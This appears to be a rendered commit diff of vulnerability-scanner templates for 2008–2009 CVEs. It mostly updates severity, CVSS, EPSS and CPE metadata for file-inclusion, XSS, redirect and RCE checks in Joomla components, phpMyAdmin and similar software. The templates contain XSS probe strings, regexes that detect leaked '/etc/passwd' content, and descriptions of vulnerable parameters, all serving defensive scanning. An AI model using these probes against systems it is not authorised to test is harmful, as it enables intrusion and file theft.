- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-2398
cwe-id: CWE-79
cvss-score: 4.3
tags: cve,cve2008,xss
epss-score: 0.00329
cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: appserv_open_project
product: appserv
tags: cve,cve2008,xss
http:
- method: GET
@ -27,15 +29,16 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=confirm('xss')>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=confirm('xss')>"
part: body
- type: word
words:
- "text/html"
part: header

16
http/cves/2008/CVE-2008-2650.yaml
View File

@ -3,22 +3,27 @@ id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
severity: medium
description: |
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference:
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42792
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42793
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2008-2650
cwe-id: CWE-22
tags: cve,cve2008,lfi,cmsimple
epss-score: 0.06344
cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cmsimple
product: cmsimple
tags: cve,cve2008,lfi,cmsimple
http:
- raw:
@ -29,7 +34,6 @@ http:
matchers-condition: and
matchers:
- type: regex
part: body
regex:

11
http/cves/2008/CVE-2008-4668.yaml
View File

@ -3,21 +3,25 @@ id: CVE-2008-4668
info:
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: high
severity: critical
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
- http://securityreason.com/securityalert/4464
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45490
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P
cvss-score: 9
cve-id: CVE-2008-4668
cwe-id: CWE-22
tags: cve,cve2008,joomla,lfi,edb
epss-score: 0.01018
cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: com_imagebrowser
tags: cve,cve2008,joomla,lfi,edb
http:
- method: GET
@ -26,7 +30,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

14
http/cves/2008/CVE-2008-4764.yaml
View File

@ -3,21 +3,24 @@ id: CVE-2008-4764
info:
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-4764
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
epss-score: 0.00779
cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
metadata:
max-request: 1
vendor: extplorer
product: com_extplorer
tags: edb,cve,cve2008,joomla,lfi
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

11
http/cves/2008/CVE-2008-5587.yaml
View File

@ -7,18 +7,22 @@ info:
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
- http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
- http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html
- http://securityreason.com/securityalert/4737
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2008-5587
cwe-id: CWE-22
epss-score: 0.02331
cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
vendor: phppgadmin
product: phppgadmin
tags: cve,cve2008,lfi,phppgadmin,edb
http:
@ -28,7 +32,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"

16
http/cves/2008/CVE-2008-6080.yaml
View File

@ -3,21 +3,24 @@ id: CVE-2008-6080
info:
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46039
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6080
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
epss-score: 0.00548
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: codecall
product: com_ionfiles
tags: edb,cve,cve2008,joomla,lfi
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

12
http/cves/2008/CVE-2008-6172.yaml
View File

@ -3,21 +3,24 @@ id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://nvd.nist.gov/vuln/detail/CVE-2008-6172
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46081
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2008-6172
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
epss-score: 0.00367
cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: weberr
product: rwcards
tags: cve2008,joomla,lfi,edb,cve
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

16
http/cves/2008/CVE-2008-6222.yaml
View File

@ -3,21 +3,24 @@ id: CVE-2008-6222
info:
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46356
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6222
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
epss-score: 0.00684
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomlashowroom
product: pro_desk_support_center
tags: cve2008,joomla,lfi,edb,cve
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

10
http/cves/2008/CVE-2008-6465.yaml
View File

@ -12,14 +12,18 @@ info:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-6465
cwe-id: CWE-80
cwe-id: CWE-79
epss-score: 0.00421
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: title:"Parallels H-Sphere
vendor: parallels
product: h-sphere
tags: cve,cve2008,xss,parallels,h-sphere
http:

15
http/cves/2008/CVE-2008-6668.yaml
View File

@ -3,21 +3,25 @@ id: CVE-2008-6668
info:
name: nweb2fax <=0.2.7 - Local File Inclusion
author: geeknik
severity: high
severity: medium
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43172
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6668
cwe-id: CWE-22
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
epss-score: 0.00359
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: dirk_bartley
product: nweb2fax
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
http:
- method: GET
@ -27,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
part: body
regex:

11
http/cves/2008/CVE-2008-6982.yaml
View File

@ -3,21 +3,26 @@ id: CVE-2008-6982
info:
name: Devalcms 1.4a - Cross-Site Scripting
author: arafatansari
severity: high
severity: medium
description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
reference:
- https://www.exploit-db.com/exploits/6369
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
- https://exchange.xforce.ibmcloud.com/vulnerabilities/44940
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-6982
cwe-id: CWE-79
epss-score: 0.0038
cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: devalcms
product: devalcms
tags: cve,cve2008,devalcms,xss,cms,edb
http:

5
http/cves/2008/CVE-2008-7269.yaml
View File

@ -10,15 +10,18 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2008-7269
- https://www.exploit-db.com/exploits/6823
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-score: 5.8
cve-id: CVE-2008-7269
cwe-id: CWE-20
epss-score: 0.03645
cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"SiteEngine"
verified: "true"
vendor: boka
product: siteengine
tags: cve,cve2008,redirect,siteengine
http:

6
http/cves/2009/CVE-2009-0347.yaml
View File

@ -11,14 +11,18 @@ info:
- https://www.exploit-db.com/exploits/32766
- https://www.kb.cert.org/vuls/id/202753
- https://exchange.xforce.ibmcloud.com/vulnerabilities/48336
- http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-score: 5.8
cve-id: CVE-2009-0347
cwe-id: CWE-59
epss-score: 0.08272
cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: autonomy
product: ultraseek
tags: cve,cve2009,redirect,autonomy
http:

7
http/cves/2009/CVE-2009-0545.yaml
View File

@ -10,14 +10,19 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
- http://www.vupen.com/english/advisories/2009/0385
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2009-0545
cwe-id: CWE-20
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
epss-score: 0.9719
cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeroshell
product: zeroshell
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
http:
- method: GET

16
http/cves/2009/CVE-2009-0932.yaml
View File

@ -3,21 +3,26 @@ id: CVE-2009-0932
info:
name: Horde/Horde Groupware - Local File Inclusion
author: pikpikcu
severity: high
severity: medium
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
- http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5
- http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2009-0932
cwe-id: CWE-22
tags: cve,cve2009,horde,lfi,traversal,edb
epss-score: 0.04048
cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: debian
product: horde
tags: cve,cve2009,horde,lfi,traversal,edb
http:
- method: GET
@ -26,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

22
http/cves/2009/CVE-2009-1151.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: critical
severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
@ -12,13 +12,17 @@ info:
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
cwe-id: CWE-94
epss-score: 0.79256
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
http:
- raw:
@ -33,10 +37,10 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

14
http/cves/2009/CVE-2009-1496.yaml
View File

@ -3,21 +3,24 @@ id: CVE-2009-1496
info:
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2009-1496
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00533
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

12
http/cves/2009/CVE-2009-1558.yaml
View File

@ -7,18 +7,22 @@ info:
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference:
- https://www.exploit-db.com/exploits/32954
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
- http://www.vupen.com/english/advisories/2009/1173
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
- https://exchange.xforce.ibmcloud.com/vulnerabilities/50231
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
cvss-score: 7.8
cve-id: CVE-2009-1558
cwe-id: CWE-22
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
epss-score: 0.00901
cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: wvc54gca
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
http:
- method: GET

9
http/cves/2009/CVE-2009-1872.yaml
View File

@ -6,20 +6,23 @@ info:
severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2009-1872
cwe-id: CWE-79
cvss-score: 4.3
epss-score: 0.3657
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
verified: true
vendor: adobe
product: coldfusion
tags: cve,cve2009,adobe,xss,coldfusion,tenable
http:
@ -30,9 +33,9 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header

12
http/cves/2009/CVE-2009-2015.yaml
View File

@ -7,17 +7,20 @@ info:
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
reference:
- https://www.exploit-db.com/exploits/8898
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
- http://www.vupen.com/english/advisories/2009/1530
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-2015
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00813
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

15
http/cves/2009/CVE-2009-2100.yaml
View File

@ -3,21 +3,23 @@ id: CVE-2009-2100
info:
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2009-2100
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
epss-score: 0.00528
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: cve,cve2009,joomla,lfi,edb
http:
- method: GET
@ -26,7 +28,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

15
http/cves/2009/CVE-2009-3053.yaml
View File

@ -3,21 +3,25 @@ id: CVE-2009-3053
info:
name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
- http://www.exploit-db.com/exploits/9564
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2009-3053
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
epss-score: 0.00367
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: cve,cve2009,joomla,lfi,edb
http:
- method: GET
@ -26,7 +30,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

10
http/cves/2009/CVE-2009-3318.yaml
View File

@ -8,16 +8,19 @@ info:
reference:
- https://www.exploit-db.com/exploits/9706
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
- http://www.exploit-db.com/exploits/9706
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-3318
cwe-id: CWE-22
cvss-score: 7.5
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00706
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"

Some files were not shown because too many files have changed in this diff Show More